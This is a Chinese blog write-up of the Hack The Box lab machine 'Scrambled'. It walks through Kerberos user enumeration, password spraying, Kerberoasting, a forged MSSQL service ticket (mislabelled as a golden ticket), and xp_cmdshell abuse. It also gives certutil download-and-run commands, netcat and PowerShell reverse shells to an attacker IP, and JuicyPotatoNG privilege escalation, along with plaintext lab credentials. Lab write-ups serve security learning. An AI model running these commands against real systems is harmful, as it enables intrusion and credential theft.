【Hack The Box】windows练习-- Scrambled

最新推荐文章于 2024-09-21 00:18:04 发布
最新推荐文章于 2024-09-21 00:18:04 发布 · 735 阅读 · 0
文章标签:

#windows #网络 #服务器

HTB 学习笔记

【Hack The Box】windows练习-- Scrambled

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
| ssl-cert: Subject: commonName=DC1.scrm.local
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
4411/tcp open  found

commonName=DC1.scrm.local
scrm.local
有dns,web,rpc,smb,mssql,ldap

我看80

在这里插入图片描述在这里插入图片描述
ipconfig > %USERPROFILE%\Desktop\ip.txt
还获得了一个邮箱
support@scramblecorp.com
在这里插入图片描述有一个
ScrambleDebugLog日志文件
4411有一个服务
在这里插入图片描述可以注册用户
在这里插入图片描述dirsearch -u http://scrm.local/ -x 403,401,500,400 -f
没有什么深层目录

我看139

enum4linux 10.10.11.168
啥也没有
rpc也是

我看88ker

第一步永远都是爆破用户

/root/Desktop/tools/windows/kerbrute_linux_amd64 userenum -d scrm.local --dc dc1.scrm.local /root/Desktop/tools/kerberos_enum_userlists-master/A-ZSurnames.txt

在这里插入图片描述得到结果如下

ASMITH@scrm.local
JHALL@scrm.local
KSIMPSON@scrm.local
KHICKS@scrm.local
SJENKINS@scrm.local

接下来进行密码喷洒

喷洒

前面说密码与用个户名相同,我觉得肯定有相同的
/root/Desktop/tools/windows/kerbrute_linux_amd64 passwordspray -d scrm.local --dc dc1.scrm.local user.txt ksimpson

在这里插入图片描述
获取票证

getTGT.py scrm.local/ksimpson:ksimpson -dc-ip 10.129.15.50

impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k -no-pass
但是报错了
于是搜索
好像是靶场的问题

在这里插入图片描述

在这里插入图片描述
发现是因为禁用ntlm造成的
https://github.com/SecureAuthCorp/impacket/issues/1206

在解决问题之后我们继续执行

于是我们得到了

在这里插入图片描述得到hash第一步是尝试爆破密码
在这里插入图片描述我们现在具有凭证
sqlsvc:Pegasus60

在这种情况下我们可以创建黄金票据,黄金票据需要我们知道用户凭据的ntml哈希值,还需要知道该域用户的sid

  1. 获取sid
impacket-secretsdump -k scrm.local/ksimpson@dc1.scrm.local -no-pass -debug

得到sid如下
S-1-5-21-2743207045-1827831105-2542523200-500

  1. ntml哈希值生成
https://codebeautify.org/ntlm-hash-generator

在这里插入图片描述
B999A16500B87D17EC7F2E2A68778F05

黄金票据

S-1-5-21-2743207045-1827831105-2542523200-500

B999A16500B87D17EC7F2E2A68778F05

在生成的时候,500代表用户的种类,要放到user-id 而在sid中要把500去掉

  1. 生成黄金票据
impacket-ticketer -domain scrm.local -spn MSSQLSVC/dc1.scrm.local -user-id 500 Administrator -nthash B999A16500B87D17EC7F2E2A68778F05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200

在这里插入图片描述4. 票据登陆

export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient dc1.scrm.local -k -no-pass

在这里插入图片描述

mssql攻击

enable_xp_cmdshell
 xp_cmdshell("whoami")

在这里插入图片描述SELECT name FROM master.dbo.sysdatabases
使用
ScrambleHR
use ScrambleHR
SELECT name FROM SYSOBJECTS WHERE xtype = ‘U’
select * from UserImport
在这里插入图片描述
MiscSvc:ScrambledEggs9900

一会拿个shell查看一下

xp_cmdshell certutil.exe -urlcache -f http://10.10.16.3/nc.exe ..\..\Temp\nc.exe
xp_cmdshell ..\..\Temp\nc.exe 10.10.14.12 4444 -e cmd.exe

在这里插入图片描述拿到shell之后搞一个winpeas跑一下

certutil.exe -urlcache -f http://10.10.14.12/winpeas64.exe w.exe

在这里插入图片描述

发现了未引号的exe,但是我没用,觉得麻烦
在这里插入图片描述有价值的信息如下

[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe
4411] - Auto - Running - No quotes and Space detected

CanPSRemote
但是winrm连接不上

借凭证

$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('scrm.local\MiscSvc', $SecPassword)

Invoke-Command -Computer dc1 -Credential $Cred -Command { cmd /c C:\Temp\nc.exe -e powershell 10.10.14.12 8888 }

在这里插入图片描述tasklist /v

在这里插入图片描述我不知道为什么我进不去
这很奇怪
我是有进入的权限的

第二种提权

当我在sql主机查看priv的时候,我发现了它

在这里插入图片描述
https://github.com/antonioCoco/JuicyPotatoNG/releases/tag/v1.1

cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 .

去掉多余的东西,只留下icmp反弹的部分
在这里插入图片描述
变更格式,使得脚本可以按照ps bat执行

cat rev.ps1 |iconv -t UTF-16LE | base64 -w 0

这是靶场把流氓土豆拿上去
curl http://10.10.14.12/JuicyPotatoNG.exe -o jp.exe
64

在这里插入图片描述

powershell -enc [第二步的base64]

执行
./jp.exe -t * -p C:\Temp\t.bat

在这里插入图片描述
即可拿到system

域内用户枚举和密码喷洒攻击(Password Spraying)
谢公子的博客
04-28 4309
目录 域内用户枚举 密码喷洒攻击 在 Kerberos 协议认证的 AS-REQ阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击 域内用户枚举 当主机不在域内时,我们可以通过域内用户枚举来探测域内的用户。我们可以使用nmap指定脚本来探测。 nmap ...
Windows程序设计》之SCRAMBLE
倒计时
05-31 1278
/////////////////////////////////////////////////////////////////////// //这应该是写的第一个没有窗口过程的程序 /////////////////////////////////////////////////////////////////////// int WINAPI WinMain(HINSTANCE hInst
HTB-Scrambled
2201_75378806的博客
06-01 842
Silver Ticket 是伪造的 TGS(票证授予服务)票证,直接在客户端和服务之间使用,无需经过 DC。我们的自助密码重置系统将很快启动并运行,但在此期间,请致电 IT 支持热线,我们将重置您的密码。如果没有人接听,请留言说明您的用户名,我们将重置您的密码,使其与用户名相同。该脚本旨在获取任何用户的权限属性证书,这只需要作为域中的用户进行身份验证。有大量有关该帐户的信息,但就我当前的目的而言,最后一项(在末尾看似随机的十六进制之前)是域 SID。我需要字符串形式的 SID,因此我将使用。
Hackthebox - Scrambled- linux
yutianovo的博客
03-14 1656
Hackthebox - Scrambled- linux
HTB靶场系列 Linux靶机 Bashed靶机
m0_57221101的博客
01-10 1436
勘探 惯例先用nmap扫描一下端口,发现开了80端口 ┌──(root????Mr)-[~/dirsearch] └─# nmap 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 14:30 CST Nmap scan report for 10.10.10.68 Host is up (1.2s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/
内网渗透下的密码喷洒
LiBai'S BLOG
09-27 6759
1、密码本来源途径(信息泄露、翻配置文件、翻回收站、桌面账号密码本、mimikatz抓到的)2、喷洒的时候工具尽量放到内网机器上面,本地使用工具的线程过高流量过大会导致隧道崩掉3、喷洒时可以针对一个C段进行,这样能爆出来的机器会有很多4、内网渗透中,能获取到主机管理员账号密码,将会使我们横向事半功倍,尤其是在大内网环境中,密码复用率很高,一波喷洒,能助力你拿到一波主机,对拿到的主机再次抓取密码,再用新拿到的密码喷洒一波…,如此反复。
Scrambled-Sentences-for-Anki:语言学习
05-16
安基主题 Anki的混乱句子。 这个Anki主题将帮助您提高英语水平。 ,间隔重复软件是从初学者... 还已在Windows 10(desctop)最新版本Anki上进行了测试。 卡类型 当前有一种类型的卡。 [基本的] 自由显示/隐藏,问题/答
Anki主题提升英语水平:Scrambled-Sentences-for-Anki
标题中提到的“Scrambled-Sentences-for-Anki:语言学习”是一个专门针对Anki记忆软件的语言学习主题。Anki是一种间隔重复软件,它使用算法帮助用户记住任何类型的信息,例如单词、数字、历史日期、科学公式等,特别...
Fusion on the Wavelet Coefficients Scale-Related for Double Encryption Holographic Halftone Watermark Hidden Technology
02-07
After encryption, a scrambled watermarking image through Arnold transform is embedded into the host image during the halftoning process. We characterize the multi-scale representation of the origina
Scrambled Word-crx插件
04-05
Scrambled Word-crx插件是一款专为喜爱益智和拼图游戏的用户设计的浏览器扩展程序,支持英语和西班牙语两种语言环境。这款插件旨在提供一种创新且有趣的方式来锻炼用户的词汇和语言技能。 首先,我们要理解什么是...
An Experimental Exploration of Marsaglia's Xorshift Generators, Scrambled - 13 Oct 2016 (1402.6246)-计算机科学
04-22
An experimental exploration of Marsaglia’s xorshift generators, scrambledSebastiano Vigna... Nonetheless, many of the weaknesses of xorshiftgenerators fade away if their result is scrambled by a non-lin
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 2260
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
windos工具和一些域渗透工具
2201_75378806的博客
03-27 2517
RTF是一种文本文件格式,旨在存储文本文档的格式化信息,例如字体、颜色和样式,而无需包含实际的二进制图像或多媒体数据。
Kerberos自我总结Kerberos自我总结
最新发布
Thewei666的博客
09-21 3567
域名: redteam.lab域控:操作系统: Windows Server 2016主机名: DC2016域内主机:操作系统: Windows 10主机名: WIN10-1攻击机:操作系统: kali Liux这里Kali也在内网中,主要是便于技术的展示,在实际情况中需要搭建代理,可以收用frp、chisel等攻击,再使用proxychains进行代理的连接!域名: redteam.lab域控制器:操作系统: Windows Server 2016主机名: DC2016。
内网渗透_密码喷洒攻击
qq_42383069的博客
03-28 9502
密码喷洒攻击 0x01. 背景 ⼀般我们我们与目标内网建立了 socks5 隧道后,就可以从域外(这⾥指的是我们攻击的机器)对域内机器进行密码喷洒了,前提是已经通过信息搜集或者抓密码得到了⼀批密码,我们就可以通过得到的密码来对域内进行密码喷洒 0x02. 工具与方法 1. CrackMapExec 对域内进行密码喷洒 CrackMapExec(⼜名 CME)是⼀款非常好用的密码喷洒攻击的⼯具,在 Kali Linux 默认已经安装好。 1.2. 下载地址:https://github.com/byt3bl3
Kerberos端口域用户枚举与密码喷洒
问题很多的小明
10-13 1582
环境 域控环境: hacktest.com 10.211.55.3 域内主机或者非域内主机:10.211.55.6 域控Kerberos 88端口开启: 工具准备 https://github.com/ropnop/kerbrute/releases 准备字典:111.txt 用户枚举 kerbrute_windows_amd64.exe userenum -d hacktest.com 111.txt 密码喷洒 kerbrute_windows_amd64.e
从域外对域内进行信息收集、密码喷洒
渗透之路,攻防之间皆学问
06-06 2090
LDAP(Lightweight Directory Access Protocol),轻量⽬录访问协议,是⼀种⽤来查询与更新 Active Directory 的⽬录服务通信协议。AD 域服务利⽤ LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便⽤它来访问 AD 内的对象,默认端⼝ 389。域外用户枚举、密码喷洒...
Hack The Box : Starting Point - Archetype
qq_60201815的博客
08-31 547
环境准备 攻击机:kali-linux 靶机:Archetype 需要下载的工具:impacket(GitHub链接:https://github.com/SecureAuthCorp/impacket) 从HTB下载Starting Point VPN,打开kali,利用openvpn连接,出现下图则连接成功。通过ping靶机ip验证是否连接成功。 渗透过程 先进行信息收集,利用nmap扫描目标开放端口和对应服务。 -sC:根据端口识别服务自动调用默认脚本 -sV:扫描目标主.
Hack The Boxwindows练习-- Intelligence
人间体佐菲的博客
11-17 993
Hack The Boxwindows练习-- Intelligence
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值